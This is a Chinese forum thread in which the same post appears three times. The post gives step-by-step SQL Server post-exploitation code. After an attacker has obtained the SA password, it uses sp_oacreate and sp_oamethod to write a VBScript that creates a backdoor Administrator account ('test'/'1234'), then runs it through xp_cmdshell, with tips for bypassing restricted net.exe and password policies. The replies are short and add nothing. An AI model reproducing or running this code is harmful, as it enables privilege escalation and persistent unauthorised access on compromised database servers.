查看: 497|回复: 5

Microsoft SQL Server SA权限安全

 关闭 [复制链接]

该用户从未签到

发表于 2009-11-5 23:32 | 显示全部楼层 |阅读模式
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:


  set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  os=\"WinNT://\"&wsnetwork.ComputerName
  Set ob=GetObject(os) '得到adsi接口,绑定
  Set oe=GetObject(os&\"/Administrators,group\") '属性,admin组
  Set od=ob.Create(\"user\",\"test\") '建立用户
  od.SetPassword \"1234\" '设置密码
  od.SetInfo '保存
  Set of=GetObject(os&\"/test\",user) '得到用户
  oe.add os&\"/test\"


  将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:


  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'createtextfile', @f out, 'c:\\1.vbs', 1
  exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
  (\"WSCRIPT.NETWORK\")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'os=\"WinNT://\"&wsnetwork.
  ComputerName'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
  (os&\"/Administrators,group\")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
  (\"user\",\"test\")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword \"1234\"'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
  (os&\"/test\",user) '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&\"/test\"'


  执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\\1.vbs正被另一个程序运行”而无法成功添加用户:


  exec master..xp_cmdshell 'cscript c:\\1.vbs'


  如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:


  exec master..xp_cmdshell 'echo set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  >>1.vbs'
<
PCOS系统下载站:http://zhuangji.wang

签到天数: 7 天

连续签到: 0 天

[LV.3]小小虾米II

发表于 2009-11-5 23:46 | 显示全部楼层
重新设置个比较好啊!!!
PCOS系统下载站:http://zhuangji.wang
回复 支持 反对

使用道具 举报

签到天数: 658 天

连续签到: 0 天

[LV.9]尊贵海王II

发表于 2009-11-6 08:14 | 显示全部楼层
是啊!重新设置比较好些!
PCOS系统下载站:http://zhuangji.wang
回复 支持 反对

使用道具 举报

签到天数: 2586 天

连续签到: 5 天

[LV.Master]至尊海神IIIIII

发表于 2009-11-6 08:33 | 显示全部楼层
现在是要注意安全的
PCOS系统下载站:http://zhuangji.wang
回复 支持 反对

使用道具 举报

该用户从未签到

 楼主| 发表于 2009-11-5 23:32 | 显示全部楼层

Microsoft SQL Server SA权限安全

在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:


  set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  os=\"WinNT://\"&wsnetwork.ComputerName
  Set ob=GetObject(os) &#39;得到adsi接口,绑定
  Set oe=GetObject(os&\"/Administrators,group\") &#39;属性,admin组
  Set od=ob.Create(\"user\",\"test\") &#39;建立用户
  od.SetPassword \"1234\" &#39;设置密码
  od.SetInfo &#39;保存
  Set of=GetObject(os&\"/test\",user) &#39;得到用户
  oe.add os&\"/test\"


  将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:


  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate &#39;scripting.filesystemobject&#39;, @o out
  exec sp_oamethod @o, &#39;createtextfile&#39;, @f out, &#39;c:\\1.vbs&#39;, 1
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;set wsnetwork=CreateObject
  (\"WSCRIPT.NETWORK\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;os=\"WinNT://\"&wsnetwork.
  ComputerName&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set ob=GetObject(os)&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set oe=GetObject
  (os&\"/Administrators,group\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set od=ob.Create
  (\"user\",\"test\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;od.SetPassword \"1234\"&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;od.SetInfo &#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set of=GetObject
  (os&\"/test\",user) &#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;oe.add os&\"/test\"&#39;


  执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\\1.vbs正被另一个程序运行”而无法成功添加用户:


  exec master..xp_cmdshell &#39;cscript c:\\1.vbs&#39;


  如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:


  exec master..xp_cmdshell &#39;echo set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  >>1.vbs&#39;
PCOS系统下载站:http://zhuangji.wang
回复 支持 反对

使用道具 举报

该用户从未签到

 楼主| 发表于 2009-11-5 23:32 | 显示全部楼层

Microsoft SQL Server SA权限安全

在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:


  set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  os=\"WinNT://\"&wsnetwork.ComputerName
  Set ob=GetObject(os) &#39;得到adsi接口,绑定
  Set oe=GetObject(os&\"/Administrators,group\") &#39;属性,admin组
  Set od=ob.Create(\"user\",\"test\") &#39;建立用户
  od.SetPassword \"1234\" &#39;设置密码
  od.SetInfo &#39;保存
  Set of=GetObject(os&\"/test\",user) &#39;得到用户
  oe.add os&\"/test\"


  将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:


  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate &#39;scripting.filesystemobject&#39;, @o out
  exec sp_oamethod @o, &#39;createtextfile&#39;, @f out, &#39;c:\\1.vbs&#39;, 1
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;set wsnetwork=CreateObject
  (\"WSCRIPT.NETWORK\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;os=\"WinNT://\"&wsnetwork.
  ComputerName&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set ob=GetObject(os)&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set oe=GetObject
  (os&\"/Administrators,group\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set od=ob.Create
  (\"user\",\"test\")&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;od.SetPassword \"1234\"&#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;od.SetInfo &#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;Set of=GetObject
  (os&\"/test\",user) &#39;
  exec @ret = sp_oamethod @f, &#39;writeline&#39;, NULL,&#39;oe.add os&\"/test\"&#39;


  执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\\1.vbs正被另一个程序运行”而无法成功添加用户:


  exec master..xp_cmdshell &#39;cscript c:\\1.vbs&#39;


  如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:


  exec master..xp_cmdshell &#39;echo set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")
  >>1.vbs&#39;
PCOS系统下载站:http://zhuangji.wang
回复 支持 反对

使用道具 举报

本版积分规则